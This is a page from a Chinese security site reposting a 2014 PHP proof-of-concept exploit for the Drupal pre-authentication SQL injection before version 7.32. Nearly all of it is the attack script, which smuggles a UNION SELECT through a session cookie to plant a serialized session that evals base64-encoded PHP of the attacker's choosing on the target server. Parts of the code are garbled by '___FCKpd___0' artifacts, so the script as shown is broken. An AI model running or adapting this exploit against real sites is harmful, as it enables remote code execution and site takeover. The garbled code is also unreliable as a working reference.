首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Drupal < 7.32 Pre Auth SQL Injection
来源:stefan.horst@sektioneins.de 作者:Horst 发布时间:2014-11-05  
<?php
//    _____      __   __  _             _______
//   / ___/___  / /__/ /_(_)___  ____  / ____(_)___  _____
//   \__ \/ _ \/ //_/ __/ / __ \/ __ \/ __/ / / __ \/ ___/
//  ___/ /  __/ ,< / /_/ / /_/ / / / / /___/ / / / (__  )
// /____/\___/_/|_|\__/_/\____/_/ /_/_____/_/_/ /_/____/
// Poc for Drupal Pre Auth SQL Injection - (c) 2014 SektionEins
//
// created by Stefan Horst <stefan.horst@sektioneins.de>
//        and Stefan Esser <stefan.esser@sektioneins.de>
//·

include 'common.inc';
include 'password.inc';

// set values
$user_id = 0;
$user_name = '';

$code_inject = 'phpinfo();session_destroy();die("");';

$url = isset($argv[1])?$argv[1]:'';
$code = isset($argv[2])?$argv[2]:'';

if ($url == '-h') {
      echo "usage:\n";
      echo $argv[0].' $url [$code|$file]'."\n";
      die();
}

if (empty($url) || strpos($url,'https') === False) {
      echo "please state the cookie url. It works only with https urls.\n";
      die();
}

if (!empty($code)) {
      if (is_file($code)) {
              $code_inject = str_replace('<'.'?','',str_replace('<'.'?php','',str_replace('?'.'>','',file_get_contents($code))));
      } else {
              $code_inject = $code;
      }
}

$code_inject = rtrim($code_inject,';');
$code_inject .= ';session_destroy();die("");';

if (strpos($url, 'www.') === 0) {
      $url = substr($url, 4);
}

___FCKpd___0
SESSION= array('a'=>'eval(base64_decode("'.base64_encode($code_inject).'"))','build_info' => array(), 'wrapper_callback' => 'form_execute_handlers', '#Array' => array('array_filter'), 'string' => 'assert');
___FCKpd___0
SESSION['build_info']['args'][0] = &
___FCKpd___0
SESSION['string']; list( , $session_name) = explode('://', $url, 2); // use insecure cookie with sql inj. $cookieName = 'SESS' . substr(hash('sha256', $session_name), 0, 32); $password = user_hash_password('test'); $session_id = drupal_random_key(); $sec_ssid = drupal_random_key(); $serial = str_replace('}','CURLYCLOSE',str_replace('{','CURLYOPEN',"batch_form_state|".serialize(
___FCKpd___0
SESSION))); $inject = "UNION SELECT $user_id,'$user_name','$password','','','',null,0,0,0,1,null,'',0,'',null,$user_id,'$session_id','','127.0.0.1',0,0,REPLACE(REPLACE('".$serial."','CURLYCLOSE',CHAR(".ord('}').")),'CURLYOPEN',CHAR(".ord('{').")) -- "; $cookie = $cookieName.'[test+'.urlencode($inject).']='.$session_id.'; '.$cookieName.'[test]='.$session_id.'; S'.$cookieName.'='.$sec_ssid; $ch = curl_init($url); curl_setopt($ch,CURLOPT_HEADER,True); curl_setopt($ch,CURLOPT_RETURNTRANSFER,True); curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,False); curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:34.0) Gecko/20100101 Firefox/34.0'); curl_setopt($ch,CURLOPT_HTTPHEADER,array( 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language: en-US,en;q=0.5' )); curl_setopt($ch,CURLOPT_COOKIE,$cookie); $output = curl_exec($ch); curl_close($ch); echo $output;

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mac OS X Mavericks IOBluetooth
·Linux Local Root => 2.6.39 (32
·Xerox Multifunction Printers (
·Linux/x86 Add map in /etc/host
·GNU Wget FTP Symlink Arbitrary
·X7 Chat 2.0.5 lib/message.php
·Joomla RD Download SQL Injecti
·i-FTP Buffer Overflow SEH Expl
·MAARCH 1.4 - Arbitrary File Up
·i.Hex Local Crash Proof of Con
·IBM Tivoli Monitoring 6.2.2 kb
·i.Mage Local Crash Proof of Co
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved